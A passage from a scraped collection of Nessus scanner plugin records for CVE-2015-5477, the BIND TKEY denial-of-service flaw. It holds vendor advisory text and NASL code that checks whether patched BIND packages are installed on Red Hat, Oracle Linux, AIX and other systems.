cpu:\"s390x\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-debuginfo-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:17", "description": "From Red Hat Security Advisory 2015:1514 :\n\nUpdated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bind (ELSA-2015-1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-libbind-devel", "p-cpe:/a:oracle:linux:bind-libs", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind-utils", "p-cpe:/a:oracle:linux:caching-nameserver", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85116", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1514 and \n# Oracle Linux Security Advisory ELSA-2015-1514 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85116);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"Oracle Linux 5 : bind (ELSA-2015-1514)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1514 :\n\nUpdated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005224.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:17", "description": "Updated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 5 : bind97 (RHSA-2015:1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind97", "p-cpe:/a:redhat:enterprise_linux:bind97-chroot", "p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind97-devel", "p-cpe:/a:redhat:enterprise_linux:bind97-libs", "p-cpe:/a:redhat:enterprise_linux:bind97-utils", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85070", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1515. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85070);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"RHEL 5 : bind97 (RHSA-2015:1515)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1515\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:39", "description": "According to its self-reported version number, the installation of ISC BIND on the remote name server is potentially affected by a denial of service vulnerability due to a REQUIRE assertion flaw that occurs while handling TKEY queries. A remote attacker can exploit this by using a specially crafted TKEY query to crash the daemon.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-05T00:00:00", "type": "nessus", "title": "ISC BIND 9.7.x < 9.9.7-P2 / 9.10.x < 9.10.2-P3 TKEY Query Handling Remote DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:isc:bind"], "id": "BIND9_9102_P3.NASL", "href": "https://www.tenable.com/plugins/nessus/85241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85241);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"EDB-ID\", value:\"37721\");\n\n script_name(english:\"ISC BIND 9.7.x < 9.9.7-P2 / 9.10.x < 9.10.2-P3 TKEY Query Handling Remote DoS\");\n script_summary(english:\"Checks the version of BIND.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote name server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the installation of\nISC BIND on the remote name server is potentially affected by a denial\nof service vulnerability due to a REQUIRE assertion flaw that occurs\nwhile handling TKEY queries. A remote attacker can exploit this by\nusing a specially crafted TKEY query to crash the daemon.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01272\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01280\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to BIND version 9.9.7-P2 / 9.10.2-P3 or later, or apply the\npatch referenced in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"bind_version.nasl\");\n script_require_keys(\"bind/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"bind/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID); # patch can be applied\n\nfix = '';\n\n# 9.1.0 through BIND 9.9.7-P1 and BIND 9.10.2-P2 are vulnerable\nif (\n ver =~ \"^9\\.[1-8]([^0-9]|$)\" ||\n ver =~ \"^9\\.9\\.[0-6]([^0-9]|$)\" ||\n ver =~ \"^9\\.9\\.7($|([ab][12]|rc[12]|-P1)$)\"\n) fix = '9.9.7-P2';\n\nif (\n ver =~ \"^9\\.10\\.[01]([^0-9]|$)\" ||\n ver =~ \"^9\\.10\\.2($|([ab][12]|rc[12]|-P[12])$)\"\n) fix = '9.10.2-P3';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:53, proto:\"udp\", extra:report);\n }\n else security_hole(port:53, proto:\"udp\");\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"BIND\", 53, ver, \"UDP\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:40", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 9 : bind9 (IV75692)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV75692.NASL", "href": "https://www.tenable.com/plugins/nessus/85415", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85415);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 6.1 TL 9 : bind9 (IV75692)\");\n script_summary(english:\"Check for APAR IV75692\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"05\", patch:\"IV75692s5a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.9.45\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:38", "description": "Jonathan Foote discovered that the BIND DNS server does not properly handle TKEY queries. A remote attacker can take advantage of this flaw to mount a denial of service via a specially crafted query triggering an assertion failure and causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Debian DSA-3319-1 : bind9 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bind9", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3319.NASL", "href": "https://www.tenable.com/plugins/nessus/85053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3319. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 